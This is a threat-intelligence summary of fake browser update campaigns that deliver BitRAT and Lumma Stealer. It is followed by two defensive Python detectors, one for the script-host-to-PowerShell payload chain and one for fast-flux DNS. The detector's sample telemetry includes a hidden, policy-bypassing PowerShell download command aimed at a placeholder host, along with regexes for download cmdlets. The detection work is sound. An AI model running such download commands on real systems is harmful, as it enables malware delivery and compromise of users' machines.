June 3, 2024 at 12:00AM
Fake web browser updates are distributing remote access trojans (RATs) and info stealer malware like BitRAT and Lumma Stealer. Cybersecurity firm eSentire reported that attackers use bogus browser update lures to deliver malware. The attack chain involves booby-trapped sites, Discord-hosted ZIP archives, and PowerShell scripts. Threat actors also employ webhards and DNSPod for malware distribution.
Key takeaways from the meeting notes:
– Cybercriminals are using fake web browser update lures to distribute remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer, including the well-known SocGholish malware.
– The attack chain often starts with users visiting a compromised website with JavaScript code redirecting them to a bogus browser update page. This page contains a link to a ZIP archive file hosted on Discord, leading to the automatic download of the file “Update.zip” onto the victim’s device.
– Threat actors are known to use Discord as an attack vector, with a recent analysis uncovering over 50,000 dangerous links distributing malware, phishing campaigns, and spam.
– The ZIP archive file “Update.zip” contains a JavaScript file (“Update.js”), triggering the execution of PowerShell scripts responsible for retrieving additional payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files.
– Attacks also involve the use of PowerShell scripts for establishing persistence and a .NET-based loader to launch the final-stage malware. The same loader is used to deploy both BitRAT and Lumma Stealer.
– BitRAT enables attackers to harvest data, mine cryptocurrency, download more binaries, and gain remote control over infected hosts, while Lumma Stealer captures information from web browsers, crypto wallets, and other sensitive details.
– Cybercriminals are leveraging trusted names to maximize reach and impact, using fake browser update lures as a common means of entry to devices or networks. This includes new variants of the ClearFake campaign that trick users into manually executing malicious PowerShell code under the pretext of a browser update.
– Lumma Stealer is identified as one of the most prevalent information stealers, with a rising popularity among adversaries due to its high success rate in infiltrating systems and exfiltrating sensitive data without detection.
– New campaigns have been disclosed that use webhards to distribute malicious installers for adult games, cracked versions of Microsoft Office, and various malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
– Additionally, cybercriminals are utilizing websites offering pirated software to deploy malware loaders like PrivateLoader and TaskLoader, which are offered as pay-per-install (PPI) services for other cybercriminals to deliver their own payloads.
– CryptoChameleon is using DNSPod nameservers to engage in fast flux evasion techniques, allowing threat actors to cycle through large amounts of IPs linked to a single domain name, thus evading traditional countermeasures and reducing the operational value of legacy point-in-time IOCs.
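The chain described in the takeaways (compromised site, fake update page, Discord-hosted Update.zip, Update.js run by the Windows script host, PowerShell fetching PNG-disguised payloads) leaves a recognisable process lineage on the endpoint. The following Python is an added example, not code from eSentire or the article: it scans constructed process-creation records in the shape a Sysmon Event ID 1 or EDR sensor would emit and flags a powershell.exe child of wscript.exe/cscript.exe when the script was launched from a user-writable path and the PowerShell command line fetches an image-extension URL. All hosts, paths, PIDs and URLs are constructed sample data; the thresholds and regexes are assumptions to be tuned against your own telemetry.

```python
"""Heuristic detection of the fake-browser-update process chain.

Added example (not from eSentire or the article). Looks for:
  wscript.exe/cscript.exe running a .js from a user-writable path
    -> child powershell.exe downloading a .png/.jpg/.gif payload.
All events below are constructed sample telemetry, not real IoCs.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry in time order (hosts, PIDs, URLs are placeholders).
SAMPLE_EVENTS = [
    ProcEvent("ws01", 100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws01", 200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Update.zip\Update.js"'),
    ProcEvent("ws01", 300, 200,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -ep bypass -c iwr http://example.invalid/img/update.png -OutFile $env:TEMP\u.png"),
    # Benign lineage: a vendor maintenance script under Program Files.
    ProcEvent("ws02", 400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws02", 500, 400, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Program Files\Vendor\maint.js"'),
    ProcEvent("ws02", 600, 500,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Program Files\Vendor\cleanup.ps1"),
]

# Assumed patterns; tune to local conventions.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads)\\", re.I)
SCRIPT_HOST = re.compile(r"\\(wscript|cscript)\.exe$", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
JS_ARG = re.compile(r"\.js\b", re.I)
IMAGE_DOWNLOAD = re.compile(
    r"(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer)\b"
    r".*https?://\S+\.(png|jpg|jpeg|gif)\b", re.I)
EVASION_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|e(p|xecutionpolicy)\s+bypass)", re.I)


def find_update_lure_chains(events):
    """Return one finding per powershell.exe whose parent is a script host
    that ran a .js from a user-writable path, and whose own command line
    fetches an image-extension URL (the PNG-wrapped payload pattern)."""
    by_pid = {(e.host, e.pid): e for e in events}
    findings = []
    for e in events:
        if not POWERSHELL.search(e.image):
            continue
        parent = by_pid.get((e.host, e.ppid))
        if parent is None or not SCRIPT_HOST.search(parent.image):
            continue
        js_from_user_path = bool(JS_ARG.search(parent.cmdline)) and \
            bool(USER_WRITABLE.search(parent.cmdline))
        fetches_image = bool(IMAGE_DOWNLOAD.search(e.cmdline))
        if js_from_user_path and fetches_image:
            signals = ["script_host_js_from_user_path", "powershell_image_download"]
            if EVASION_FLAGS.search(e.cmdline):
                signals.append("powershell_hidden_or_bypass")
            findings.append({
                "host": e.host,
                "script_host_pid": parent.pid,
                "powershell_pid": e.pid,
                "script": parent.cmdline,
                "download": e.cmdline,
                "signals": signals,
            })
    return findings


if __name__ == "__main__":
    for f in find_update_lure_chains(SAMPLE_EVENTS):
        print(f"[{f['host']}] pid {f['powershell_pid']} <- {f['script_host_pid']}: {f['signals']}")
```

Only the ws01 lineage is reported; the ws02 vendor script runs from Program Files and fetches nothing, so it is skipped. Requiring both the parent condition and the child's download pattern keeps the rule narrow; the `signals` list lets an analyst see which parts matched when loosening it.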
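The last takeaway notes that fast flux cycles many IPs behind one name, so a point-in-time IP indicator loses value quickly. A defender can instead profile each domain's resolution behaviour over time. The Python below is an added example (not code from the article or any vendor named in it): it aggregates constructed passive-DNS style records per domain and marks a domain as a fast-flux suspect when it shows many distinct IPs across several /16 prefixes with short TTLs. The record format, thresholds and the /16 grouping are assumptions; addresses come from RFC 5737 documentation ranges and the domains are placeholders.

```python
"""Fast-flux profiling over passive-DNS style resolution records.

Added example, not from the article. Rather than matching individual IPs
(which a fast-flux operator rotates away from), it measures how many
distinct addresses and network prefixes a domain resolved to, and at what TTL.
"""
from collections import defaultdict

# Constructed records: (epoch seconds, domain, resolved IPv4, TTL seconds).
SAMPLE_RESOLUTIONS = [
    (0,    "flux.example.invalid",   "192.0.2.10",    60),
    (120,  "flux.example.invalid",   "198.51.100.7",  60),
    (240,  "flux.example.invalid",   "203.0.113.21",  60),
    (360,  "flux.example.invalid",   "192.0.2.77",    60),
    (480,  "flux.example.invalid",   "198.51.100.99", 60),
    (600,  "flux.example.invalid",   "203.0.113.5",   60),
    (0,    "static.example.invalid", "192.0.2.200",   3600),
    (1800, "static.example.invalid", "192.0.2.200",   3600),
    (3600, "static.example.invalid", "192.0.2.201",   3600),  # one planned move
]


def flux_profile(records, min_ips=5, max_avg_ttl=300, min_prefixes=3):
    """Return per-domain statistics and a fast-flux verdict.

    A domain is flagged when it resolved to at least `min_ips` distinct
    addresses spread over at least `min_prefixes` distinct /16 prefixes
    with an average TTL at or below `max_avg_ttl` seconds. Thresholds are
    assumptions chosen for the sample; calibrate on a CDN-heavy baseline.
    """
    per_domain = defaultdict(list)
    for ts, domain, ip, ttl in records:
        per_domain[domain].append((ts, ip, ttl))

    profile = {}
    for domain, rows in per_domain.items():
        ips = {ip for _, ip, _ in rows}
        # Crude /16 grouping; an ASN lookup would be the production choice.
        prefixes = {".".join(ip.split(".")[:2]) for ip in ips}
        avg_ttl = sum(ttl for _, _, ttl in rows) / len(rows)
        timestamps = [ts for ts, _, _ in rows]
        profile[domain] = {
            "unique_ips": len(ips),
            "unique_prefixes": len(prefixes),
            "avg_ttl": avg_ttl,
            "observation_span_s": max(timestamps) - min(timestamps),
            "fast_flux_suspect": (len(ips) >= min_ips
                                  and avg_ttl <= max_avg_ttl
                                  and len(prefixes) >= min_prefixes),
        }
    return profile


if __name__ == "__main__":
    for domain, stats in flux_profile(SAMPLE_RESOLUTIONS).items():
        print(domain, stats)
```

In the sample, flux.example.invalid cycles through six addresses in three prefixes within ten minutes at a 60-second TTL and is flagged; static.example.invalid changes address once with hour-long TTLs and is not. Large CDNs also rotate addresses, so in practice the prefix count is better replaced by an ASN count and the thresholds set from a baseline of known-good domains.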